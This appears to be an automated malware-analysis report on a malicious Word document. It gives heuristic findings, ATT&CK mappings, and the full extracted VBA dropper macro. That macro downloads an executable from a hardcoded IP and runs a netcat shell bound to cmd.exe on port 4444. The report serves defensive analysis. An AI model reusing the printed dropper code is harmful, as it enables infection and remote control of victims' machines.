Verdict: MALICIOUS
Risk Score: 362
Malware Insights
MITRE ATT&CK

- T1059.005 Visual Basic
- T1105 Ingress Tool Transfer
- T1204.002 Malicious File
- T1059.003 Windows Command Shell
The VBA script uses WScript.Shell and CreateObject to download a file from 'hTtP://92.63.197.172/crypted.exe' and save it as 'nc.COM'. It then executes 'nc.COM -L -p 4444 -e cmd.exe', indicating an attempt to establish a reverse shell. The document body explicitly prompts the user to enable macro content, a common lure.
Heuristics (10)

- VBA macros detected (medium; 5 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code.
- WScript.Shell usage (critical) [OLE_VBA_WSCRIPT]. Matched line in script: `Set MTIzNDU2Nzg = CreateObject("WScrIpt.ShEll")`
- VBA downloads and writes a file to disk (critical) [OLE_VBA_HTTP_DROP_EXEC]: VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning. Matched line in script: `hpamtsbm1vcHF.write GVuIHNlc2FtZQ.responseBody`
- CreateObject call (high) [OLE_VBA_CREATEOBJ]. Matched line in script: `Set GVuIHNlc2FtZQ = CreateObject("MicrOsofT.XMLHTTP")`
- cmd.exe reference in VBA (high) [OLE_VBA_CMD]. Matched line in script: `MzMz = "nc.COM -L -p 4444 -e cmd.exe" 'Command to run after downloading`
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Reference to Windows Script Host (high) [SC_STR_WSCRIPT].
- OLE file has appended executable-looking payload bytes (high) [OLE_APPENDED_PAYLOAD]: OLE compound file contains a large high-entropy region beyond the declared major streams, and that region includes shellcode, PE, or loader API markers. This is a payload-carrier signal, not a specific CVE attribution by itself.
- Macro/content-enable lure (medium) [SE_ENABLE_LURE]: Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - hTtP://92.63.197.172/crypted.exe (referenced by macro)
  - http://schemas.openxmlformats.org/drawingml/2006/main (referenced by macro)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2854 bytes | 3ee9eafc008255268e45a49533bb0662cf1d7f8f2e6a6e6b6f26fd50e10484d8 |
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "moscow"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "moscowwww"
Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal Milliseconds As LongPtr)
Sub ACADFASDFASD()
Dim GVuIHNlc2FtZQ
Dim hpamtsbm1vcHF
Dim MTIzNDU2Nzg
Set GVuIHNlc2FtZQ = CreateObject("MicrOsofT.XMLHTTP")
Set hpamtsbm1vcHF = CreateObject("ADODB.StrEam")
Set MTIzNDU2Nzg = CreateObject("WScrIpt.ShEll")
NTU1NTU = "hTtP://92.63.197.172/crypted.exe" 'Where to download the file from
NDQ0NA = "nc.COM" 'Name to save the file (on the local system)
MzMz = "nc.COM -L -p 4444 -e cmd.exe" 'Command to run after downloading
GVuIHNlc2FtZQ.Open "GET", NTU1NTU, False
Sleep 1
GVuIHNlc2FtZQ.send
Sleep 1
hpamtsbm1vcHF.Type = 1
Sleep 2
hpamtsbm1vcHF.Open
Sleep 1
hpamtsbm1vcHF.write GVuIHNlc2FtZQ.responseBody
hpamtsbm1vcHF.savetofile NDQ0NA, 2
Sleep 1
MTIzNDU2Nzg.Run MzMz
End Sub
Attribute VB_Name = "swxidw"
' Test program for the Base64Coder module.
Option Explicit
Public Sub Main()
Test1
Test2
End Sub
Private Sub Test1()
Debug.Print "Test1 started."
Check "Aladdin:open sesame", "QWxhZGRpbjpvcGVuIHNlc2FtZQ==" ' example from RFC 2617
Check "", ""
Check "1", "MQ=="
Check "22", "MjI="
Check "333", "MzMz"
Check "4444", "NDQ0NA=="
Check "55555", "NTU1NTU="
Check "abc:def", "YWJjOmRlZg=="
Check "????", "Pz8/Pw=="
Check "abcdefghijklnmopqrstuvwxyz0123456789???", "YWJjZGVmZ2hpamtsbm1vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Pz8/"
Debug.Print "Test1 completed."
End Sub
Private Sub Test2()
Debug.Print "Test2 started."
Dim i As Long
For i = 1 To 10000
Dim s1 As String: s1 = GenerateRandomString(80)
Dim s2 As String: s2 = Base64EncodeString(s1)
Dim s3 As String: s3 = Base64DecodeString(s2)
If s3 <> s1 Then Debug.Print "Encode/decode failed for """ & s1 & """ / """ & s2 & """ / """ & s3 & """."
Next
Debug.Print "Test2 completed."
End Sub
Private Sub Check(ByVal plainText As String, ByVal base64Text As String)
Dim s1 As String: s1 = Base64EncodeString(plainText)
Dim s2 As String: s2 = Base64DecodeString(base64Text)
If s1 <> base64Text Or s2 <> plainText Then _
Debug.Print "Check failed for """ & plainText & """ / """ & base64Text & """."
End Sub
Private Function GenerateRandomString(ByVal MaxLen As Integer) As String
Dim l As Integer: l = Int(Rnd() * (MaxLen + 1))
Dim s As String: s = Space$(l)
Dim p As Integer
For p = 1 To l: Mid$(s, p, 1) = ChrW$(Int(Rnd * 256)): Next
GenerateRandomString = s
End Function
```